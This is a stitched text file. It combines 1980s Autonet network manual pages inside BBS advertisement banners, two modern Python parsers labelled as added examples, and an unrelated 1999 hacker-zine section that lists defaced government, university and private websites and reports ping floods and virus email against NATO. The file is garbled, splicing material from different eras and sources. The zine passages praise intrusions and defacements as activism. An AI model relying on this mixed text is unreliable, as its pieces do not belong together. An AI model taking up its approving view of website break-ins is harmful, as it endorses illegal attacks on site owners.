                 GENERAL FORM    T cn
                                 cn  is the alphanumeric code which identifies the
                                 terminal model.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ T D1 ]
                                 (Autonet  establishes optimal parameters for ter-
                                 minal model.)
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ T D1;C 5555 ]
                                 Autonet  sets  optimal  parameters  for  terminal
                                 model and requests a connection to host 5555.
                 NOTES           A list of codes for commonly used terminal models
                                 appears in "HOW TO USE AUTONET" and under the op-
                                 tion TERMINAL in  Autonet's  on-line  information
                                 directory,   AID.   Contact  your  Autonet  Sales
                                 Specialist for further information.
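
The connection dialog grammar described above (semicolons between commands, a space between a command name and its parameter), as an added Python example that is not part of the Autonet manual or of the original file. The field widths, exact-case command names, the rejection of repeated commands and the billing shown for a combined ID;C line are assumptions; the manual states none of them.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# ASSUMPTION: maximum widths are read off the manual's placeholders
# (nnnnnnnnnn = 10, xxxxxxxxx = 9, cn = 2); the manual states no limits.
ARG_RULES = {
    "C": re.compile(r"\d{1,10}|[A-Za-z]{1,10}"),  # numeric address or alphabetic name
    "ID": re.compile(r"[A-Za-z0-9-]{1,9}"),       # e.g. 1234-567
    "T": re.compile(r"[A-Za-z0-9]{2}"),           # e.g. D1
    "H": None,                                    # takes no parameter
}


class DialogError(ValueError):
    """Raised when a line does not follow the documented grammar."""


@dataclass(frozen=True)
class Command:
    name: str
    arg: Optional[str] = None


def parse_line(line: str) -> List[Command]:
    """Split on ';', then on the space between name and parameter."""
    commands = []
    for raw in line.split(";"):
        parts = raw.split()
        if not parts:
            raise DialogError("empty command between semicolons")
        name, args = parts[0], parts[1:]
        # ASSUMPTION: names are matched exactly as printed (upper case).
        if name not in ARG_RULES:
            raise DialogError(f"unknown command {name!r}")
        rule = ARG_RULES[name]
        if rule is None:
            if args:
                raise DialogError(f"{name} takes no parameter")
            commands.append(Command(name))
        elif len(args) != 1 or not rule.fullmatch(args[0]):
            raise DialogError(f"bad parameter for {name}: {' '.join(args)!r}")
        else:
            commands.append(Command(name, args[0]))
    return commands


def summarize(line: str) -> dict:
    """Describe what the network would do with one dialog line."""
    by_name = {}
    for cmd in parse_line(line):
        # ASSUMPTION: a repeated command is ambiguous, so it is rejected.
        if cmd.name in by_name:
            raise DialogError(f"{cmd.name} given more than once")
        by_name[cmd.name] = cmd
    c, ident = by_name.get("C"), by_name.get("ID")
    if ident is not None:
        # ID alone connects to the host tied to that identity code; adding C
        # names another destination. Billing for ID;C is an assumption.
        destination = c.arg if c is not None else "default host of " + ident.arg
        charged_to = "user"
    elif c is not None:
        destination, charged_to = c.arg, "subscribing host"
    else:
        destination = charged_to = None
    return {
        "destination": destination,
        "charged_to": charged_to,
        "password_prompt": ident is not None,   # ID requires a valid password
        "terminal": by_name["T"].arg if "T" in by_name else None,
        "prints_help": "H" in by_name,
        # H or T on their own are followed by another Command: prompt.
        "prompts_again": c is None and ident is None,
    }


def is_valid(line: str) -> bool:
    try:
        summarize(line)
        return True
    except DialogError:
        return False


if __name__ == "__main__":
    # The first three lines are the manual's own examples; the last is malformed.
    for entry in ("C NAME;H;T D1", "ID 2345-12;C 5555", "T D1", "C 55A5"):
        print(entry, "->", summarize(entry) if is_valid(entry) else "rejected")
```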
       Another Great Directory from Hacker Supreme. (Ninja Squirrel /+\, Logan - 5,)
             (Zaphod Breeblebox, Silicon Rat, Lord Vision, Crazy Horse, Lancelot-1.)
       [ ------------------- Infinity-Cartel Alliance Network --------------------- ]
       [ The Cartel 1&2 Adventure/AE/BBS 5 meg ------ 206-825-6236, or 206-939-6162 ]
       [ Infinity's Edge Adventure/AE/Cat/BBS 10 meg ----------------- 805-683-2725 ]
       [ The Center Of Eternity BBS ---------------------------------- 817-496-1777 ]
       [ ---------- The Cartel #3 and The Cartel 20 Meg AE coming soon! ----------- ]
        Another file downloaded from:                               NIRVANAnet(tm)
        & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
        Rat Head                                 Ratsnatcher          510-524-3649
        Burn This Flag                           Zardoz               408-363-9766
        realitycheck                             Poindexter Fortran   415-567-7043
        Lies Unlimited                           Mick Freen           415-583-4102
          Specializing in conversations, obscure information, high explosives,
              arcane knowledge, political extremism, diversive sexuality,
              insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
         Full access for first-time callers.  We don't want to know who you are,
          where you live, or what your phone number is. We are not Big Brother.
                                 "Raw Data for Raw Nerves"

       [ AUTONET SERIES (Section 2) ]
       @C 31340
       313 40 CONNECTED
       Autonet Line 3130158025
       Command: H
       The Autonet connection dialog commands are: 
       COMMAND FORMAT              FUNCTION              EXAMPLE 
       C nnnnnnnnnn   Requests a connection to a host    C 5555 
                      whose address is nnnnnnnnnn.        
       C cccccccccc   Requests a connection to a host    C NAME 
                      whose name is cccccccccc.           
       H              Prints this list of commands.      H 
       ID xxxxxxxxx   Identifies the user and re-        ID 1234-567
                      quests a  connection  to  the       
                      host  associated  with  the         
                      user's identity code xxxxxxxxx.     
       T cn           Identifies a terminal model by     T D1 
                      the terminal identity code cn.      
                      See the TERMINAL option of AID.     
         * Use a space to separate a command name and its parameter. 
         ** Use a semicolon (;) to separate commands which occupy the same line. 
         *** To access the Autonet Information Directory (AID):  
          Type: C ADPNS
          Use the account-user number: 1300-7777
          Use the password: AID
       Command: C ADPNS
       ADP Network Services
       Account-User Number--1300-7777
       Password: AID
       Job 45  Sys #161  Line 15825  02:02 EDT (06:02 GMT)  Fri 13-Sep-85
             ***  Welcome to AID - the Autonet Information Directory  ***
             AID is a free, public database of information  about  ADP's
             value-added  network  and data communications services.  To
             obtain a list of your options, please type 'HELP'.  Use the
             'HELP' command whenever you need assistance.
        ACCESS          - Third party network access information            
        AID             - Lists how to use AID                              
        AUTOMAIL        - Describes ADP's Computer Based Message System     
        BYE             - Exits from network and disconnects terminal       
        CHANGES         - Lists impending phone number changes              
        CONNECT         - Lists network connection procedures               
        DOCUMENT        - Lists Autonet publications                        
        DONE            - Exits from network and disconnects terminal       
        GLOSS           - Lists glossary of Autonet communications terms    
        HELP            - Lists this set of options                         
        INTERNATL       - International network access information          
        MESSAGES        - Lists network messages                            
        NEWS            - Lists Autonet news items and service bulletins    
        PHONE           - Lists network access phone numbers                
        2400BPS         - 2400 Baud dial-up access numbers                  
        TERMINAL        - Lists Autonet terminal identity codes             
        TEST            - Network and terminal test programs                
        TROUBLE         - Lists network trouble reporting procedures        
       Align paper and press the RETURN key.     
       Last Updated:  July 1985
       Last Reviewed: July 1985
       3 pages
       Autonet Communications Glossary
       Access Location     A city in which Autonet can be accessed through a
                           toll-free telephone call.
       AHIP                Asynchronous Host Interface Processor.  A com-
                           munication computer that connects a host computer
                           to Autonet.
       Asynchronous ASCII  A device consisting of a keyboard which represents
          Terminal         128 distinct characters (such as upper and lower case
                           alphabetics, numerals, punctuation and control
                           characters) and a display screen or printing mechanism.
                           The terminal is used to send data to, or receive data
                           from a computer by a start-stop transmission method.
       ATC                 Asynchronous Terminal Concentrator.  An Autonet
                           network access service arrangement which also
                           features local async ports for multiple terminals.
       Autonet             An Autonet access facility consisting of one
       Communication       or more network nodes.
       AutoWATS            A host interface arrangement for users whose
                           initial data communications needs are small.
                           The service provides subscribers with value-
                           added WATS service at 50% less than conventional
                           WATS lines.
       Bit                 The smallest unit of data.
       BPS                 Bits Per Second.  A rate of speed at which bits
                           are transmitted.
       CCITT               The International Consultative Committee
                           for Telegraphy and Telephony of the
                           International Telecommunications Union,
                           which recommends industry standards.
       Dial Back-up        A service option which establishes
                           a temporary circuit to route around line
                           or node failures.
       DTF                 Dedicated Terminal Facility.  An Autonet network
                           access service arrangement which features
                           a hardwired connection to an access port.
       Error Detection     A system which detects transmission errors
       and Correction      and causes data to be retransmitted un-
       Code                til it is received correctly.
       Front End           A device which performs communications processing
       Processor           and certain protocol functions before passing
                           data to the host.
       HAL                 Host Access Line.  A single leased line which
                           supports one simultaneous connection between
                           a host computer and a network node.
       HCF                 Host Communication Facility.  A leased com-
                           munication line which connects a host computer
                           to a network node.
       Host                A computer system which processes data,
                           as contrasted to a computer used for com-
                           munications purposes.
       Leased Access       A communication line used to con-
       Channel             nect client equipment to a port at an
                           Autonet Communication Center, or to a con-
       Modem               A device which converts digital signals to
                           analog form for transmission over tele-
                           phone lines.
       Node                An Autonet communication computer which
                           accepts and transmits packets, and performs
                           network access and interface functions.
       Non Prime           A cost-saving Public Dial-In service
       Subscription        option featuring reduced rates
                           during off-peak business hours.
       Packet              A unit of traffic on a packet-switching
                           network.  A packet consists of a destination
                           address, special control function characters,
                           error detection code, as well as message
                           data, all arranged in a special format.
       Packet-switching    Method of transmitting data between
                           client equipment by means of formatted packets.
       Port                A communication interface between Autonet and
                           a terminal or host computer.
       Private Rotary      A service option which features access
                           to a number of access ports through a single
                           private number.
       Protocol            A pre-established order for the transfer
                           of data over a communications channel.
       Remote Access       A network connection which establishes
                           communication with data processing equipment
                           from a distant location.
       Traffic             Data transmitted between user terminals
                           and host computers via Autonet.
       Virtual Dedicated   A billing option which features a
       Ports               flat monthly rate in lieu of Public Dial-In
                           access and traffic charges.
       X.25                The industry standard packet-switching
                           protocol approved by the CCITT.
       XHIP                X.25 Host Interface Processor.  An Autonet
                           host interface service arrangement which
                           features multiple terminal access over a
                           single communication line.
       [ AUTONET SERIES (Section 3) ]
                 To optimize Autonet's treatment of your terminal, use the
                 identity  code suggested for your terminal model.   Enter
                 the code by using the optional T command during the Autonet
                 connection procedure. Autonet will interpret the code and
                 will automatically establish the most effective parameters
                 for the operating characteristics of your device.  In many
                 cases, parameters can be permanently set at the host instal-
                 lation, thereby eliminating the need to use the T command
                 In most cases,  if you are using an intelligent asynchro-
                 nous ASCII CRT, you may use code  D1.  Your  Autonet  Ac-
                 count Administrator,  the person in your organization who
                 handles Autonet matters, can advise you.  This list is a
                 representative sample of terminal types and does not sug-
                 gest that support is limited only to these terminals.  If
                 your terminal is unlisted, simply use the code associated
                 with a like-device.
                 Code    Terminal Model
                 D1      ADDS CONSUL 520, 580, 980
                 D1      ADDS ENVOY 620, REGENT SERIES
                 A1      ALANTHUS DATA TERMINAL T-133
                 A8                             T-300
                 A3                             T-1200
                 A2      ALANTHUS MINITERM
                 D1      AM-JACQUARD AMTEXT 425
                 D1      ANDERSON JACOBSEN 510
                 B1      ANDERSON JACOBSEN 630
                 B3      ANDERSON JACOBSEN 830, 832
                 B5      ANDERSON JACOBSEN 860, 880
                 D1      ANN ARBOR TERMINALS AMBASSADOR, 400S
                 D1      APPLE II
                 D1      ATARI 400, 800
                 D1      AT&T DATASPEED 40, 40/1, 40/2, 40/3
                 B3                     43
                 A8      CENTRONICS 761
                 D1      COMMODORE PET
                 D1      COMPU-COLOR II
                 A2      COMPUTER DEVICES CDI 1030
                 A8      COMPUTER DEVICES TELETERM 1132
                 A2      COMPUTER DEVICES MINITERM 1200 SERIES
                 A2      COMPUTER TRANSCEIVER EXECUPORT 300, 380, 3000
                 A9      COMPUTER TRANSCEIVER EXECUPORT 1200
                 A8      COMPUTER TRANSCEIVER EXECUPORT 4000
                 D1      CPT 6000, 8000
                 D1      DATAMEDIA ELITE
                 D1      DATAPOINT 1500,1800,2200,3000,3300,3600,3800
                 A1      DATA PRODUCTS PORTATERM
                 B3      DATA TERMINAL & COMMUNICATIONS DTC 300, 302
                 B3      DIABLO HYTERM
                 D1      DIGI-LOG 33 & TELECOMPUTER II
                 A8      DIGITAL EQUIPMENT LA 35-36, LA 120
                 D1      DIGITAL EQUIPMENT VT50, VT52, VT100, WS78, WS200
                 B3      GEN-COMM SYSTEMS 300
                 A5      GE TERMINET 30
                 A4      GE TERMINET 300
                 A3      GE TERMINET 120, 1200
                 D1      GENERAL TERMINAL GT-100A, GT-101, GT-110,
                                          GT-400, GT-400B
                 D1      HAZELTINE 1400, 1500, 2000
                 D3      HEWLETT PACKARD 2621
                 D1      HEWLETT PACKARD 2640 SERIES
                 D1      IBM 3101
                 D1      INFORMER 1304, D304
                 D1      INFOTON 100, 200, 400, VISTAR
                 D1      INTERTEC INTERTUBE II
                 D1      LANIER WORD PROCESSOR
                 D1      LEAR SIEGLER ADM SERIES
                 D1      LEXITRON 1202, 1303
                 A2      MEMOREX 1240
                 D1      MICOM 2000, 2001
                 D1      NBI 3000
                 A2      NCR 260
                 D1          761
                 D1      PERKIN-ELMER MODEL 1100, OWL, BANTAM
                 A8      PERKIN-ELMER CAROUSEL 300 SERIES
                 B3      QWINT SYSTEMS 700 SERIES TELEPRINTERS
                 D1      RADIO SHACK TRS 80
                 D1      RESEARCH INC. TELERAY
                 D1      TEKTRONIX 4002-4024
                 A1      TELETYPE MODEL 33, 35
                 D1      TELETYPE MODEL 40
                 B3      TELETYPE MODEL 43
                 D1      TELETYPE MODEL 40/1, 40/2, 40/3
                 A7      TEXAS INSTRUMENT 725
                 A2                       733
                 A6                       735
                 D1                       743, 745, 763, 765
                 B3                       820, 840
                 D1                       99/4
                 B1      TRENDATA 4000 (ASCII)
                 A2      TYMSHARE 110, 212
                 A8               315
                 B3               325
                 B4      UNIVAC DCT 500
                 D1      WANG 20, 25, 30, 015, 130, 145
                 A1      WESTERN UNION EDT 33, 35
                 A3                        300
                 A4                        1200
                 D1      XEROX 800, 850, 860
                 B3      XEROX 1700 SERIES
       [ AUTONET SERIES (Section 4) ]
                                       Autonet Publications
                 Autonet's Sales Specialist has no doubt supplied you with various
                 documents   that  describe  our  services.  When  you  become  an
                 authorized user of  Autonet,  you  will  also  be  supplied  with
                 documentation that describes how to use our services.
                 If you would like  additional  copies  of  Autonet  publications,
                 please  contact  the  Autonet Marketing Services Administrator at
                 313/769-6800. ext. 6742.
                  DOCUMENT NUMBER  TITLE                                 PRICE
                  310-2.5-184      Autonet Price Schedule                $  .50
                                   Autonet Capabilities Overview         $  .50
                  310-1.3-483      Autonet Service Guide                 $ 1.00
                  310-1.4-583      Autonet X.3 Parameters                $  .25
                  310-1.5-1183     International Access                  $  .25
                  310-1.6-1182     Autonet X.25 Interface                $  .25
                  310-1.7-185      AutoWATS                              $  .25
                  310-1.9-185      How To Use Autonet                    $ 1.25
                  320-1-682        Autonet CCL Manual                    $ 8.00
                  310-2.6-184      Autonet Discount Schedule             $  .25
                  310-2.9-1084     Autonet Interim HCF                   $  .25
                  21-1.4-683       Introduction to AutoMail              $  .25
                  21-2.2-284       AutoMail Price Schedule               $  .25
                  310-3.1-1184     Autonet Terminal Reference Card       $  .10
                  310-3.0-1184     Autonet Detailed Usage Report --    
                                       Autonote                          $  .25
                 If you have any questions, or need additional information, please
                 contact us via our Ann Arbor headquarters at 313/769-6800.
                                         Autonet Messages
                 Autonet displays various messages at your  terminal  to  indicate
                 whether or not you have been successful in establishing a connec-
                 tion to the network or to your host computer. If  you  experience
                 trouble, please report the problem to your designated contact and
                 specify which message you received.
                 CALL CONNECTED
                 Your call has been connected.
                 CALL CLEARED
                 Indicates a normal disconnect. Disconnects resulting  from  other
                 causes will appear in the format
                              ?**CALL CLEARED BY HOST. CODE:ccc-ddd
                                  ?**CALL CLEARED.  CODE:ccc-ddd
                 where ccc is the cause code, and ddd is the diagnostic code  used
                 by Network Control for problem identification and resolution.
                 ?**NO SUCH HOST:xxxxxxxxxx
                 PLEASE TRY AGAIN.
                 No host exists by the name or address of xxxxxxxxxx.  Check  your
                 entry for typographical errors.
                 ?**HOST NOT AVAILABLE. CODE:9-133
                 The host interface is temporarily not in service.
                 You  must  use  the ID command with your assigned user number and
                 password to connect to this host.
                 ?**THIS DESTINATION HOST IS BUSY. CODE:1-132
                 Please contact Autonet Client Services.
                 ?**YOU HAVE BEEN DISCONNECTED. CODE:5-143
                 The network path to  the  host  computer  has  been  down  for  3
                 minutes,  automatically  disconnecting  the call. Hang up and try
                 ?**ALL HOST PORTS IN USE. CODE:1-130
                 The network is fully operational, but all connections between the
                 network and the host are in use. Try again in a few minutes.
                 ?**HOST PORT IS NOT RESPONDING. CODE:9-128
                 A  port on the destination host is not responding. Please contact
                 your Autonet Administrator.
                 ?**HOST IS NOT RESPONDING. CODE:9-129
                 The network is fully operational, but the host computer  is  down
                 or  not  responding. Please try again in a few minutes or contact
                 your Autonet Administrator.
                 ?**INPUT LOST
                 The network's capacity to accept input has been  exceeded.  Enter
                 the information again.
                 PLEASE TRY LATER.
                 The path from this access point to  the  host  computer  is  tem-
                 porarily inoperative. Try again in a few minutes.
                 ?**CCL ERROR:
                 A CCL command which contains an error has  been  entered  at  the
                 terminal  or  has  been  sent  by the host computer. Refer to the
                 Autonet CCL Manual command documentation and make the correction.
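
An added Python example (not from the Autonet documentation or the original file) that pulls the message text and the ccc-ddd cause and diagnostic codes out of a session log, which is what the manual asks users to report to their designated contact. The transcript is constructed, the re-prompt after a failed call is assumed, and reading ccc as a CCITT X.25 clearing cause is an assumption.

```python
import re
from collections import Counter
from typing import List, NamedTuple, Optional, Tuple

# ASSUMPTION: ccc is the CCITT X.25 clearing cause in decimal. Only the three
# values that appear in the manual's examples are mapped here.
X25_CAUSE = {1: "number busy", 5: "network congestion", 9: "out of order"}

ERROR_RE = re.compile(
    r"^\?\*\*(?P<text>[^:.]+?)"                           # text up to '.' or ':'
    r"(?:\.\s*CODE:(?P<cause>\d{1,3})-(?P<diag>\d{1,3})"  # ". CODE:ccc-ddd"
    r"|:(?P<detail>.*)"                                   # ":xxxxxxxxxx"
    r"|\.)?\s*$"                                          # bare trailing '.'
)
STATUS = ("CALL CONNECTED", "CALL CLEARED")


class Message(NamedTuple):
    kind: str                 # "status" or "error"
    text: str
    cause: Optional[int]
    diag: Optional[int]
    detail: Optional[str]


def parse_message(line: str) -> Optional[Message]:
    """Return a Message for a network message line, or None for anything else."""
    s = line.strip()
    if s in STATUS:
        return Message("status", s, None, None, None)
    m = ERROR_RE.match(s)
    if m is None:
        return None
    cause, diag = m.group("cause"), m.group("diag")
    return Message(
        "error",
        m.group("text").strip().upper(),
        int(cause) if cause else None,
        int(diag) if diag else None,
        (m.group("detail") or "").strip() or None,
    )


def report(transcript: str) -> List[Tuple[Optional[str], Message]]:
    """Pair every network message with the last Command: entry before it."""
    events, last_cmd = [], None
    for line in transcript.splitlines():
        s = line.strip()
        if s.startswith("Command:"):
            last_cmd = s[len("Command:"):].strip()
            continue
        msg = parse_message(s)
        if msg is not None:
            events.append((last_cmd, msg))
    return events


def failures_by_cause(events) -> Counter:
    """Tally error messages by cause, using the assumed X.25 names."""
    tally = Counter()
    for _, msg in events:
        if msg.kind != "error":
            continue
        if msg.cause is None:
            tally["no code"] += 1
        else:
            tally[X25_CAUSE.get(msg.cause, f"cause {msg.cause}")] += 1
    return tally


# Constructed transcript: message texts and codes are the ones the manual lists.
SAMPLE = """\
Autonet Line 3130157042
Command: C 5555
?**ALL HOST PORTS IN USE. CODE:1-130
Command: C 5555
?**HOST IS NOT RESPONDING. CODE:9-129
Command: C NAME
?**NO SUCH HOST:NAME
PLEASE TRY AGAIN.
Command: C 5555
CALL CONNECTED
?**YOU HAVE BEEN DISCONNECTED. CODE:5-143
"""

if __name__ == "__main__":
    for command, msg in report(SAMPLE):
        print(f"{command:10} {msg.kind:7} {msg.text} {msg.cause}-{msg.diag} {msg.detail}")
    print(dict(failures_by_cause(report(SAMPLE))))
```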

  H.W  Hacked websites 

     Note: The hacked site reports stay, especially with some cool hits by
           groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

         * Hackers Against Racist Propaganda (See issue #7)
       With the war in Kosovo, many attacks on NATO related sites ...
       April 2nd NASA Site hacked by Russians
       by BHZ, Friday 3rd Apr 1999 on 1.00 am CET
       Well actually no they don't, but if you see one of NASA sites, hacked
       (http://wireless.jpl.nasa.gov/nato.html), you'll see a funny image of them. Yet another
       From Russia With Love hack. Page stated some messages against NATO.

       April 1st NATO website hit by Yugoslav hackers
       NATO Web site hit by Yugoslav  hackers
       By Tom Diederich
       From Computerworld

        As NATO warplanes continued their bombing campaign over Yugoslavia this week, PC users in Belgrade were
        striking back with cyberwarfare tactics -- pings, spam and virus-infected e-mail -- aimed at crippling the
        alliance's public-information Web site, a NATO spokesman said Wednesday. 

        "Basically, three things have happened that have made access [to the site] erratic, the first being a so-called
        ping bombardment, which began Saturday," the spokesman said in a telephone interview from Brussels.
        "Ping" is actually a legitimate program that sends out an electronic ping to another computer to see if the other
        system is available to communicate. Hackers have used the function to flood target systems, making them
        unavailable to legitimate users. 

        The ping bombardment, traced to computers in Belgrade -- as were "the vast majority of the attacks" --
        saturated lines and disrupted site access, according to the spokesman, who requested anonymity. 

        Belgrade's next cybersalvo was launched soon afterward -- a payload of spam. The same e-mail
        message, sent thousands of times daily, was short and  to the point: "It said 'F--- You!' each time," the
        spokesman said. 

        The third attack was in the form of macro viruses hidden inside e-mail attachments. "We've since installed
        antivirus software, which has been effective in combating the viruses," he said. "In fact, we have
        measures in place that successfully counter all of the attacks." He stressed that NATO servers had in no way
        been "hacked." 

        Attacks were limited to NATO's public information site, the NATO spokesman said. "And there is no direct link
        whatsoever ... between the NATO classified networks and our Internet configuration, so NATO networks have
        not been hit by this." 

        Although the spokesman said Belgrade's alleged attacks on NATO's Web site were now being
        successfully thwarted, he admitted that configuration troubles with a new server -- coupled with a 100% spike
        in traffic from people worldwide seeking information on NATO operations in Yugoslavia -- were causing
        connection problems. 

        Some attempts to visit NATO's Web site Wednesday evening ended up at a page that said: "Server closed.
        Description: Unable to connect to the site 'www.nato.int' for the document 'http://www.nato.int/'. The site is down,
        overloaded or unreachable. Try connecting again later." 

       Forwarded From: William Knowles 
       [HSX.com] (3.30.99) The websites of two hot young actors were recently
       hacked. All right movie buffs, if you're fans of Ben Affleck (BAFFL) and
       Matt Damon (MDAMO), then you've probably visited their fan sites at
       www.ben-affleck.com and www.matt-damon.com, respectively.  These sites
       have the standard photographs of the bare-chested actors on their home
       page along with links to articles and stories about their upcoming and
       past projects.
       A few weekends ago, a computer geek with far too much time on his hands
       hacked into their sites and posted some lewd and crude commentary about
       Damon and Affleck's sexual preference. A rumor quickly spread throughout
       Hollywood that Affleck was indeed gay. By far the lighter of the two
       diatribes was posted on Damon's website. It read as follows: 
       "Hi, this is Matt Damon... My lover Ben and I would like to ask the entire
       homosexual community to support Kevin Mitnick and get him released from
       You might recall that Kevin Mitnick (www.kevinmitnick.com) was the famous
       hacker who eluded authorities for years and was finally caught a couple of
       years back.  After breaking into government computers, he has been held in
       a federal prison for four years without a trial.
       Now, the fan site hacker didn't stop there in his support of Mitnick and
       his prank on the two actors. On Affleck's site he posted a profane "quote"
       from the Forces of Nature (FORCS) star supposedly explaining why Matt
       convinced him to speak out on behalf of the jailed Mitnick.  Needless to
       say, the "reasons" were a tad too racy to reprint here.
       Obviously Affleck and Damon did not post such rantings themselves and they
       have had no official comment. As for the hackers, if they wanted to bring
       attention to the Mitnick case, they probably would have better served
       their role model with postings that didn't display their own sexual
       phobias. The fan site hacker(s) are still at large.
     Here's a nice overview of recent *relevant* hacks, sourced from the
     http://www.freespeech.org/resistance/ site .... thanks guys for a nice
     piece of work, keep it up! See the special section for some texts on
     hacktivism largely sourced from this site for this issue, and keep
     checking back to their site for news on upcoming events and hacks -Ed
     From the website;
     "This website is dedicated to all the hackers who use their work to fight against injustice, oppression, racism and censorship.

     Some years ago it turned to be a new challenge for some hackers to hack and alter the homepages of companies, groups, organizations and even
     political parties - it started to become a kind of sport. Soon hackers realized that the internet is the perfect area to practice a kind of electronic civil
     disobedience without physically harming someone or something. This new movement came to fame by the new term "Hacktivism". Below you'll
     find an archive of some websites that got hacked by hacktivists since 1996, the pages aren't censored in any way and 100% in their original state.
     You'll find only pages which were hacked with a political message, not this lame script-kiddie stuff."
      1999 archive

         Victim               Date        Information
   windy.ama.noaa.gov       01/02/99   Site link: windy.ama.noaa.gov
                                        Volt of the Insecure Crew cracked a server of the U.S. Government.
   Chinese Universities     01/02/99   
                                       Since two hackers were sentenced to death in China there's a
                                       cyber-war declared against Chinese Government and Institutions.
                                       TouGong hacked some universities to protest the killing.
   Chinese Government       01/07/99   www.bd-mof.gov.cn
                                       The cyber-war against China goes on. Hackers from Poland and
                                       Croatia hacked the Chinese government at www.bd-mof.gov.cn .
 www.china-window.com       01/08/99   www.china-window.com
                                       Another Chinese site was cracked by gH aka gLobaL heLL . The
                                       hacked page includes a rant addressed to milw0rm and LoU .
  humanrights-china.org     01/10/99   humanrights-china.org
                                       It seems that this site has a huge lack of security - it was hacked for
                                       the second time in three months. This time the site was visited by NIS
                                       - Network Intrusion Specialists.
                                       This site was hacked because it contained child porn . There's no
                                       hint about the identity of the hacker but maybe a group called
                                       E.H.A.P - Ethical Hackers Against Pedophilia ( www.ehap.org ) who
                                       fights kiddie porn sites is responsible for this.
   Chinese Government      01/11/99    www.rftgd.gov.cn
                                       Another server of the Chinese Gov't ( www.rftgd.gov.cn ) was
                                       cracked by the Network Intrusion Specialists ( NIS ). Don't forget to
                                       read the hidden text in the source.
   Chinese Government      01/16/99    www.hcptt.gx.cn/
                                       The Chinese Ministry of Post and Telecommunications
                                       (www.hcptt.gx.cn) was defaced by a hacker who wants to remain
   Chinese Government      01/25/99    wenjin.nlc.gov.cn
                                       Pentaguard cracked wenjin.nlc.gov.cn and left a statement against
   Chinese Government      01/27/99    www.landbridge.gov.cn
                                       Another hack by Pentaguard, this time they hit the Chinese Gov't at
                                       http://www.landbridge.gov.cn .
       Ku Klux Klan        01/27/99
                                       The official homepage of the Ku Klux Klan ( www.kukluxklan.net )
                                       got hacked by S C R E A M, the OLM and H.A.R.P (Hackers Against
                                       Racist Parties). The original content was replaced with a statement
                                       against racism.
      Malaysian Gov't      02/01/99    www.go.com.jo
                                       A group named The Club seems to be the first who cracked a site in
     www.bcb.gov.bo       02/14/99     www.bcb.gov.bo
                                       BANCO CENTRAL DE BOLIVIA (Central Bank of Bolivia) was 0wned
                                       by dr_fdisk^.
   www.whitepride.com     02/19/99     www.whitepride.com
                                       Another fascist site bites the dust. This hack was brought to you by
                                       H.A.R.P (Hackers Against Racist Parties) the same group who
                                       cracked the Ku Klux Klan some weeks before.
   hollywoodbookstore     02/22/99     www.hollywoodbookstore.com
                                       "Security is an illusion" - TEAM SPL0IT proved this thesis for the
                                       domain www.hollywoodbookstore.com .
    www.comdex.com        02/22/99     www.comdex.com
                                       This site was hacked by E-pRoM, they claim freedom for MP3'z and
                                       Operating Systems.
    www.unjbg.edu.pe      02/24/99     www.unjbg.edu.pe
                                       Two universities in Peru were compromised by Hi-Tech Hate.
    State of Minnesota    02/27/99     www.stpaul.lib.mn.us
                                       The Saint Paul Public Library Web ( www.stpaul.lib.mn.us ) of
                                       Minnesota was hacked by kon, who seems to be a great fan of
                                       Governor Jesse Ventura.
    www.ieetam.org.mx     03/03/99     www.ieetam.org.mx
                                       Moskos Sex Hackers Team hacked www.ieetam.org.mx, it seems
                                       that Mexico is becoming a new battlefield for hacktivists.
  www.pccreations.com     03/03/99     www.pccreations.com
                                       TEAM SPL0IT used this hack to tell the public about the risks of the
                                       built-in Processor Serial Number of the new Pentium III .
 www.chiapascee.org.mx    03/04/99     www.chiapascee.org.mx
                                       This Mexican site was hacked by LyU99, a member of the new
                                       generation of hackers in Mexico .
     Monica Lewinsky      03/04/99     www.monicalewinsky.com
                                       The domain www.monicalewinsky.com was hacked by the
                                       IRC.PSYCHIC.COM team. Come to think of it, when could we respect
  www.university.com.ar   03/10/99     http://www.university.com.ar
                                       dr_fdisk^ compromised some university sites in Argentina,
                                       www.university.com.ar was one of his victims.
    www.cndh.org.mx       03/11/99     www.cndh.org.mx
                                       alt3kx_H3z of team RazaMExicana cracked the website of the
                                       National Commission of Human Rights in Mexico.
 www.quickpress.com.ar    03/13/99     www.quickpress.com.ar
                                       Another page compromised by dr_fdisk^. The fight for Kevin's
                                       freedom goes on, even in Argentina.
    Mexican Congress      03/13/99     www.cddhcu.gob.mx
                                       DaCure of Moskoz Sex Hackers Team hacked the Mexican Congress
                                       at www.cddhcu.gob.mx .
       www.leute.at       03/14/99     www.leute.at
                                       TEAM SPL0IT hacked this Austrian site to warn about the increasing
                                       pollution of our planet.
 www.mrshockwave.com      03/25/99     www.mrshockwave.com
                                       "tell your governments to stop the war" - TEAM SPL0IT protests the
                                       war in Serbia.
  www.toulouse.edu.pe     03/27/99     www.toulouse.edu.pe
                                       A university in Peru which was hacked by another group one month
                                       before was now re-hacked by dr_fdisk^. It seems this site has a little
  nmimc1.med.navy.mil     03/27/99     nmimc1.med.navy.mil
                                       An alliance of the groups HDT, KpZ, CHC and Legion2000 called
                                       "Russian Hackers Union", cracked a server of the US Navy and
                                       replaced the original site with an anti-NATO message.
      www.anuies.mx       03/28/99     http://www.anuies.mx
                                       alt3kx_H3z hacked the homepage of the National Association of
                                       Universities and Higher Education in Mexico.

                  Free hosting for this website is provided by www.freespeech.org
                                    last update : 03/29/99

       For the most part these sites are gleaned from the rumours section of HNN
      unless otherwise noted and are just that, unconfirmed rumours... 

      contributed by Anonymous 
      Cracked March 26th'99
      Some high profile sites have been reported as cracked.
       March 28th weekend cracks from HNN rumours
       contributed by Anonymous 

       This was a relatively busy weekend for cracked web
       sites. Some sites were cracked in protest of recent
       NATO actions and some in support of it. Some sites
       were cracked for religious reasons and others for
       political activities in Mexico. We have received reports
       that the following sites have been compromised.

      Cracked sites March 30th
      contributed by Anonymous 
      The onslaught continues:
       Named in a post by Mea Culpa and mirrored on Attrition;
       Some of these are interesting as the crackers got more creative and
       included original poetry. Also funny is my old domain (lemming.com) got

      Domains hacked:

      contributed by Anonymous 
      April 1st
      Yes, all of these sites were reported as cracked. There
      is no April Fools here.

     Hack details from HNS http://net-security.org/ - Help Net Security

     by BHZ, Sunday 28th Mar 1999 on 1:00 am CET
